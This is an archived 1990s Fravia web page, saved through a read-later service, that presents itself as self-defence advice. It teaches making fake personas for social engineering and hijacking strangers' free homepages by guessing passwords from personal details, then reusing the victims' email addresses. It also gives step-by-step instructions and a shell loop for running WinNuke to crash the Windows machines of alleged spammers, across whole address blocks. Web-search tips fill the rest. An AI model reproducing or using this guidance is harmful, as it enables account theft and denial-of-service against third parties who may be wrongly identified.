Learn how to defend yourself
woodmann.com | Nov 12th 1996This page doesn't appear to be an article and therefore may not display well in the Article View. You may want to switch to the Full Web Page view.
If you know there should be an article here, help improve the article parser by reporting this page. Thanks!
Based on some private emailings from +ORC
"...these days, on the Web, you'll never be too careful, travel always through your cloack identities and with your applets killer on, keep your cache empty, watch out for cookies and do not bump too oft on wizard sites... Work well, +ORC"
back to the top of this nice page
The Web is immense and the chances are on our side. If you only spent a minute per page and devoted ten hours a day to it, it would take four and a half years to explore a million Web pages, a lifetime to explore just a part of it, an automated search engine can do the same in two days, but in the same time quite a lot of these pages will have been changed/moved/migrated
Once you have some identities (say three or four) remember that:
- Your Avatars interests should be VERY different
- If possible the language you use should be different for each Avatar (if you know only english use at least different language patterns, say university professor as A and lorry driver as B)
What's the point of having many identities?
You'll need the AVatars to practicise some nice Web activities (offensive and defensive)
- enemy studying (see below)
- social engineering (if you need something or if you want to get more info about a target)
- intranet activities (see below)
- homepage high capering (see below)back to the top of this nice page
For simple capering you do not even need a fake identity and you may practicize it on many "easy" targets on the net. Capering is one of the best methods to conceal your identity: use following approach:
- Find a free page provider with easy password validation scheme (say Angelfire, but also Geocities and Mygale can be used)
- Read many pages of people that are NOT computer experts and that do NOT update very oft (if ever)... you may be able to find the updating schedule on the free provider's pages.
- Let's say that the content of three such pages is the following: "Me and my dog Bertie", This page is a tribute to my nice daughter Simona" and "I love lollypops".
- Try "capering" these pages using as passwords, respectively, Bertie, Simona and Lollypop.
You'll get -on average- one bingo out of 15 tryes. Now you got some pages belonging to somebody else: do some of the following (mixing the points as needs be):
1) Do not change the page, change only the password and leave it alone for a couple of months
and/or
2) Migrate immediatly to another location
and/or
3) Change password
and/or
4) Use the email address of the page owner to get other free pages by other providers
and/or
5) Kill the page you capered
and/or
6) Repeat the same procedure twice
Now you'll have some "capered" pages that you can more safely (but not completely) use as
- "Depot" pages
- "Dormient" pages
- "Trap" (Luring) pages
For your own "intranet" (sort of, see below)
back to the top of this nice page
You'll find a first approach on the ad hoc enemy page
a nice fine c program (Winnuke) by _eci... listing at the end of this section
How to use WinNuke to get rid of spammers winnuke.c is a program which will crash any Windows 95/NT machine. Since this operating system is popular among spammers, winnuke makes it easy to get rid of them. First, take the program code from the bottom of this post (everything after the ---Cut Here--- line) and save it to a text file called winnuke.c on your shell account or Linux box. Now compile it by typing: gcc winnuke.c -o winnuke If you have SunOS, you may need to use this command instead: gcc winnuke.c -lsocket -lnsl -o winnuke You should now have an executable program called winnuke in your directory. Now find the spammer's IP number. This is the first IP number in the mail headers which is not your mail server or mail relay. Once you have the spammer's IP number (eg 192.168.12.109) type: ./winnuke 192.168.12.109 except use the spammer's real IP number that you found. You should see something like the following: % ./winnuke 192.168.12.109 Connected to [192.168.12.109:139]. Sending crash... Done! % Congratulations! You just nuked a spammer! Give yourself a pat on the back. You can ping the IP address to verify that it is actually down. If it doesn't work... Unfortunately a few spammers don't have just one IP address but a whole block (255 addresses) In this case you will need to nuke the entire block. To do this, use this script: #!/bin/csh @ number = 255 loop: @ number = $number - 1 ./winnuke 205.199.212.$number & #sleep 1 if ($number > 1) then goto loop endif Except you should use the first three bytes of the spammer's IP number instead of 205.199.212. If your net connection is too slow, uncomment the sleep command (line 6) and that will slow it down so it can get all the packets out. That's it...
nice, isn't it?
You believe that searching the web is just using AltaVista, Hotbot and the other search engines? (Which you'll all find here btw).
You are wrong: there are (at least) three other possibilities:
1) Searching per email, see my lessons:
Fravia's own lessons
[Available lessons:] lesson_5 ~ General use of agora, http:// retrieving ~ July 1996 ~ complete
lesson_6 ~ Ftping files, agora queries and emailing altavista ~ December 1996 ~ complete
lesson_7 ~ W3gate, search spiders, error messages and evaluation of results ~ March 1997 ~ complete
lesson_8 ~ Advanced searching techniques (combing and klebing) ~ November 1997 ~ complete
lesson_9 ~ Searching effectively ~ Site monitoring ~ January 1998 ~ complete
lesson_10 ~ Let the bots search for you ~ and build your own search-bots :-) ~ June 1998 ~ 'light'
2) Searching through own robots/spiders, you'll find material on this here.
3) Using the searches that OTHERS have made! (combing)
I divide this field in "usenet combing" and "topsites combing"
I have started working on this in March 1997, and I don't think you'll find it somewhere else!
(c) Fravia :-)
Usenet combing is preferably made through simple email (never underestimate the POWER of email for internet investigating matters):
To: Email-Queries@Reference.COM Subject: (None) Text: FIND search AND engines
Another possibility is through an Agora's "news:" command:
To: agora@dna.affrc.go.jp Subject: (None) Text: send news:alt.anonymous
Topsites combing is very useful to find quickly "delicate" subjects, like warez and free "images". You don't do it obviously on newsgroups (where you'll always find only an infinite list of "me-too" lusers). You'll go instead, for instance straight to
Web-Counter
Where you'll have a look at the "Top 1000" pages
and Websidestory
The World Top 1000 Pages Where you'll have a look at the Top 1000 "hackers" page (for instance).
The same applies for the "normal" search engines and for many other "counters" on the web. As soon as you "see" a new counter somewhere, check immediately if there is a "top 1000" option, and wade happily through tons of information!
Enjoy!
back to the top of this nice page
bots wars antismut CGI tricks academy database tools javascript tricks
cocktails search_forms mail_Fravia
Is software reverse engineering illegal?
(c) Fravia, 1995, 1996, 1997, 1998. All rights reserved, in the European Union and elsewhere
Original Page: http://www.woodmann.com/fravia/coumes.htm
Shared from Read It Later
Comments
Post a Comment